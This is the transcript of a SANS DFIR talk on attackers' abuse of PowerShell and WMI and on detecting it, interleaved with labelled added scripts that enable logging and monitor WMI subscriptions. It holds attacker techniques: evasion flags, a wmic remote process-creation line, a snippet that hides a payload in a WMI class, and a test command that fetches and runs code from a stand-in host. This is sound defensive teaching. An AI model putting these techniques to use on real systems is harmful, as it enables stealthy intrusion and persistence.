
SANS DFIR Prague: PowerShell & WMI

903 views

Published on

My presentation from SANS DFIR Summit covering PowerShell and WMI.

Published in: Technology


Slide 1
• Quick Background
• Malicious Possibilities
• Real-World Examples
• Detection & Defense
Slide 2
• Joe Slowik, Adversary Hunter
• Current: Dragos Adversary Hunter
• Previous:
  • Los Alamos National Lab: IR Lead
  • US Navy: Information Warfare Officer
  • University of Chicago: Philosophy Drop-Out
Slide 3
• Scripting and interactive language
• Introduced in 2006, integral to Win7+ since 2009
• Full access to COM & WMI for system administration
Slide 4
• WMI = Windows Management Instrumentation
• Interactive and scriptable framework for local and remote administration
• Frequently accessed via PowerShell
Slide 5 (image): http://oversitesentry.com/wp-content/uploads/2015/08/wmiarchitecture.png

Slide 6 (image): http://kevinpelgrims.com/blog/files/images/2010/02/powershell_rsm.png

Slide 7 (image): http://www.opentechguides.com/how-to/article/powershell/132/get-system-info-remotely.html

Slide 8 (image): https://4sysops.com/wp-content/uploads/2013/03/WBEMTest-Translate-into-PowerShell.png
Slide 9 (image: http://www.freeiconspng.com/img/17209)
• PowerShell is a powerful, useful tool for network administration
• Widely used in Windows Enterprise environments
Slide 10
• WMI enables significant access to review and modify system data
• Access via PowerShell allows for scripting and automated possibilities
Slide 11
• PowerShell's ubiquity adds a significant capability for a potential attacker
• Enhances the ability to 'live off the land'
• Expands initial infection vectors
Slide 12

| Command | Use |
|---|---|
| -EncodedCommand | Accepts Base64-encoded input for execution within PowerShell |
| (New-Object System.Net.WebClient).DownloadFile() | Download a file from a remote location; can be piped to Start-Process to execute |
| -ExecutionPolicy Bypass | Circumvent system limits on script execution |
| -WindowStyle Hidden | Hide the command window from the user |
| Invoke-Expression | Execute arbitrary code or commands |
Slide 13
• Delivery vectors: VBA, VBS, BAT, JS, Registry, Startup, .lnk
Slide 14 (image): https://adsecurity.org/wp-content/uploads/2016/02/PowerShell-Detection-NetWebClientDownload.jpg
Slide 15
• WMI is also ubiquitous and a potent 'dual-use' tool
• Can enable:
  • Complex exploitation, persistence on an infected host
  • New vectors to pivot within the network
Slide 16
• PsExec-like remote execution
• Malicious file/script storage
• Persistence when combined with file or registry activity
Slide 17
• Pentesting frameworks
• Crimeware/Commodity malware
• APT
Slide 18
• Malicious VBA decodes to PowerShell
• Retrieves, then executes ransomware payload
Slide 19
• WMI filter retrieved on schedule
• Returns base64-encoded PowerShell
• PowerShell re-launches backdoor
• https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
Slide 20 (image): https://www.carbonblack.com/wp-content/uploads/2015/12/PS7.png
Slide 21
• CMD: command execution; execution parameters
• PowerShell: interactive and scripts; flags, modifiers, full visibility
• WMI: log events; correlate with other activity
Slide 22
• What is required to achieve 'bad'?
  • Process Execution
  • Persistence
  • Encode / Decode
  • Download / Upload
Slide 23
• Sysinternals Sysmon
• Windows Logging Service (WLS)
• WMI Logging via WMI Subscription
• PowerShell Logging
• Proprietary Host-based Security
Slide 24
• WLS incorporates PowerShell logging natively
• Otherwise:
  • Windows 7+
  • PowerShell 5.0+
  • Enable logging!
• See: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
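The following is an added example, not part of the presentation: it switches on the PowerShell 5.0+ logging the slide refers to, using the Group Policy registry keys described in the FireEye post the slide cites, and then hunts the resulting Script Block events (Event ID 4104) for the command patterns listed on slide 12. The transcript directory, the pattern list and the sample command line are assumptions constructed for the example; run it from an elevated session on a test host.

```powershell
# Added example (not from the presentation). Enables module, script block and
# transcription logging via the policy registry keys, then scans Event ID 4104.

function Enable-PowerShellLogging {
    param([string]$TranscriptDir = 'C:\PSTranscripts')   # assumed path; use a protected location
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

    # Module logging (Event ID 4103): pipeline execution details for every module ('*')
    New-Item -Path "$base\ModuleLogging\ModuleNames" -Force | Out-Null
    New-ItemProperty -Path "$base\ModuleLogging" -Name EnableModuleLogging -Value 1 -PropertyType DWord -Force | Out-Null
    New-ItemProperty -Path "$base\ModuleLogging\ModuleNames" -Name '*' -Value '*' -PropertyType String -Force | Out-Null

    # Script block logging (Event ID 4104): the de-obfuscated code that actually ran
    New-Item -Path "$base\ScriptBlockLogging" -Force | Out-Null
    New-ItemProperty -Path "$base\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -PropertyType DWord -Force | Out-Null

    # Transcription: full input/output of every session, written to $TranscriptDir
    New-Item -Path "$base\Transcription" -Force | Out-Null
    New-Item -Path $TranscriptDir -ItemType Directory -Force | Out-Null
    New-ItemProperty -Path "$base\Transcription" -Name EnableTranscripting -Value 1 -PropertyType DWord -Force | Out-Null
    New-ItemProperty -Path "$base\Transcription" -Name OutputDirectory -Value $TranscriptDir -PropertyType String -Force | Out-Null
}

# Heuristics for the slide 12 commands and their common short forms (assumed list;
# tune against your baseline). -match is case-insensitive, so 'iex' and 'IEX' both hit.
$SuspiciousPatterns = @(
    '-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}'   # -e / -enc / -EncodedCommand <base64>
    'DownloadFile|DownloadString'                    # System.Net.WebClient fetch
    '-ex\w*\s+bypass'                                # -ExecutionPolicy Bypass, -Exec Bypass
    '-w\w*\s+hidden'                                 # -WindowStyle Hidden, -W Hidden
    'Invoke-Expression|\biex\b'                      # arbitrary code execution
)

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$CommandLine)
    # -EncodedCommand carries Base64 over UTF-16LE text; recover it so an analyst can read it.
    # Applies to process command lines (Sysmon Event 1 / 4688) and to nested launches in a script block.
    if ($CommandLine -match '-e(nc(odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})') {
        return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[3]))
    }
    return $null
}

function Test-SuspiciousCommand {
    param([Parameter(Mandatory)][string]$Text)
    # Returns the patterns that matched (empty array when nothing matched)
    return @($SuspiciousPatterns | Where-Object { $Text -match $_ })
}

function Find-SuspiciousScriptBlock {
    param([int]$Hours = 24)
    # 4104 payload layout: [0] MessageNumber, [1] MessageTotal, [2] ScriptBlockText, [3] ScriptBlockId, [4] Path
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
                 StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $text = [string]$_.Properties[2].Value
        $hits = Test-SuspiciousCommand -Text $text
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Path    = $_.Properties[4].Value
                Matched = ($hits -join ' | ')
                Decoded = ConvertFrom-EncodedCommand -CommandLine $text
                Snippet = $text.Substring(0, [Math]::Min(200, $text.Length))
            }
        }
    }
}

# Constructed sample (not a real capture) so the checks can be exercised without event logs
$inner  = 'IEX (New-Object System.Net.WebClient).DownloadString("http://example.invalid/x")'
$sample = 'powershell.exe -NoP -W Hidden -Exec Bypass -Enc ' +
          [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($inner))
Test-SuspiciousCommand -Text $sample            # the -Enc, -Exec Bypass and -W Hidden patterns match
ConvertFrom-EncodedCommand -CommandLine $sample # recovers the IEX / DownloadString line
```

Script block logging records the decoded content of what ran, so a 4104 event for the sample above would match on `IEX` and `DownloadString` rather than on `-Enc`; the launcher flags themselves live in the process command line, which is why slide 23 pairs PowerShell logging with Sysmon or WLS. Expect the patterns to fire on legitimate administration scripts until you have done the baselining described on slide 27.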
Slide 25
• Sysinternals Sysmon: latest version includes WMI visibility
• But logging/alerting will need to be tuned
• DIY via WMI Subscription creation
• Otherwise: commercial products
Slide 26
• Establish Visibility → Baseline 'Normal' → Identify Malicious → Create Alerts & Alarms → Develop Response
Slide 27
• What PowerShell/WMI scripts are used in 'normal' network administration?
• What commands never have legitimate use?
• What, if any, items require whitelisting?
Slide 28

```
wmic /node:REMOTESYSTEM process call create "EVIL_COMMAND"
```

```sql
SELECT * FROM Win32_BIOS WHERE SerialNumber LIKE "%VMware%"
```

```powershell
# Storing a payload inside a custom WMI class on a remote system
$BADTHING = New-Object Management.ManagementClass($REMOTESYSTEM, [String]::Empty, $null)
$BADTHING['__CLASS'] = 'Evil_Malware'
$BADTHING.Properties.Add('SomethingEvil', [Management.CimType]::String, $False)
$BADTHING.Properties['SomethingEvil'].Value = $PAYLOAD
$BADTHING.Put()
```
Slide 29
• Create Event Consumer: performs action when triggered by event
• Pair with Event Filter: events of interest
• Filter to Consumer Binding: bind filter to consumer
• Export results to log file, data store
• Credit: https://www.fireeye.com/blog/threat-research/2016/08/wmi_vs_wmi_monitor.html
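The following is an added example, not code from the presentation or from the FireEye post it credits: it first inventories the permanent WMI event subscriptions already present on a host (the 'normal' baseline slide 27 asks for) and then builds the filter, consumer and binding from slide 29 so that any later creation of a filter, consumer or binding in root\subscription is appended to a log file. The subscription names and the log path are assumptions; run it elevated.

```powershell
# Added example (not from the presentation). Baseline existing WMI subscriptions,
# then register a LogFileEventConsumer that records new ones as they are created.

$script:Ns = 'root\subscription'   # permanent subscriptions live in this namespace

function Get-WmiSubscriptionBaseline {
    # Each persistence entry is three linked objects; list them all with the detail
    # an analyst needs to judge legitimacy (query, command, script or binding pair).
    # Querying the abstract __EventConsumer returns every concrete consumer type.
    foreach ($class in '__EventFilter', '__EventConsumer', '__FilterToConsumerBinding') {
        Get-WmiObject -Namespace $script:Ns -Class $class | ForEach-Object {
            $detail = if ($_.Query)                   { $_.Query }
                      elseif ($_.CommandLineTemplate) { $_.CommandLineTemplate }
                      elseif ($_.ScriptText)          { $_.ScriptText }
                      else                            { "$($_.Filter) -> $($_.Consumer)" }
            [pscustomobject]@{
                Class  = $_.__CLASS
                Name   = if ($_.Name) { $_.Name } else { $_.__RELPATH }
                Detail = $detail
            }
        }
    }
}

function Register-WmiSubscriptionMonitor {
    param([string]$LogPath = 'C:\Windows\Temp\wmi-subscription-monitor.log')   # assumed path

    # Filter: fire when a new filter, consumer or binding instance appears.
    # WITHIN sets the polling interval required for intrinsic events.
    $query = 'SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE ' +
             'TargetInstance ISA "__EventFilter" OR ' +
             'TargetInstance ISA "__EventConsumer" OR ' +
             'TargetInstance ISA "__FilterToConsumerBinding"'
    $filter = Set-WmiInstance -Namespace $script:Ns -Class __EventFilter -Arguments @{
        Name = 'DFIR_SubscriptionMonitor_Filter'; EventNamespace = $script:Ns
        QueryLanguage = 'WQL'; Query = $query }

    # Consumer: append one line per event; %...% are WMI standard string templates
    $consumer = Set-WmiInstance -Namespace $script:Ns -Class LogFileEventConsumer -Arguments @{
        Name = 'DFIR_SubscriptionMonitor_Consumer'; Filename = $LogPath
        Text = 'New %TargetInstance.__CLASS%: %TargetInstance.__RELPATH% (TIME_CREATED=%TIME_CREATED%)' }

    # Binding: join the two. The monitor now persists across reboots until removed.
    Set-WmiInstance -Namespace $script:Ns -Class __FilterToConsumerBinding -Arguments @{
        Filter = $filter; Consumer = $consumer } | Out-Null
}

function Unregister-WmiSubscriptionMonitor {
    # Remove in binding -> filter -> consumer order so nothing is left dangling
    Get-WmiObject -Namespace $script:Ns -Class __FilterToConsumerBinding |
        Where-Object { $_.Filter -like '*DFIR_SubscriptionMonitor_Filter*' } | Remove-WmiObject
    Get-WmiObject -Namespace $script:Ns -Class __EventFilter -Filter "Name='DFIR_SubscriptionMonitor_Filter'" |
        Remove-WmiObject
    Get-WmiObject -Namespace $script:Ns -Class LogFileEventConsumer -Filter "Name='DFIR_SubscriptionMonitor_Consumer'" |
        Remove-WmiObject
}

# Typical use: capture the baseline before deploying the monitor, then compare later output
Get-WmiSubscriptionBaseline | Format-Table -AutoSize
Register-WmiSubscriptionMonitor
```

Because the monitor's own binding is created last, the log will usually open with a line recording the monitor itself, which makes a convenient smoke test. The baseline on a stock Windows host already contains a few system-owned entries (for example the SCM event log filter), so save the first run and alert only on differences; ship the log file to the data store slide 29 mentions, since an attacker who can create subscriptions can also delete a local file.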
